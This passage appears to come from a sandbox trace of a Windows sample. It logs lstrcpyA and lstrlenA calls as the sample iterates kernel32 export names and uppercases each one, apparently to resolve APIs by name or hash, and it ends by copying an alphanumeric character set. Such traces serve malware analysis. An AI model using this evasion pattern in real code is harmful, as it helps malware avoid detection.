(lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.091] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.091] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.091] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.091] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.091] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.091] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.091] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.091] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.091] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.091] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.091] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.091] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.091] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.091] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.091] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.091] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.091] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.092] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.092] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.092] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.092] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.092] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.092] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.092] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.092] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.092] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.092] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.092] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.092] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.092] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.092] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.092] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.092] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.092] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.092] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.092] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.093] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.093] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.093] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.093] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.093] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.093] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.093] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.093] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.093] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.093] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.093] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.093] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.093] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.093] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.093] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.093] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.093] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.093] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.093] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.093] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.094] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.094] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.094] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.094] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.094] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.094] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.094] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.094] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.094] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.094] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.094] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.094] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.094] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.094] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.094] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.094] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.094] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.094] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.094] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.094] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.095] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.095] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.095] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.095] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.095] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.095] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.095] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.095] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.095] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.095] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.095] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.095] lstrlenA (lpString="DELETEATOM") returned 10 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.095] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.095] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.095] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.095] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.095] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.095] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.095] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.096] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.096] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.096] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.096] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.096] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.096] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.096] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.096] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.096] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.096] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.096] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.096] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.096] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.096] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.096] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.096] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.096] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.096] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.096] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.096] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.097] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.097] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.097] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.097] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.097] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.097] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.097] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.097] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.097] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.097] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.097] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.097] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.097] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.097] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.097] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.097] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.097] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") 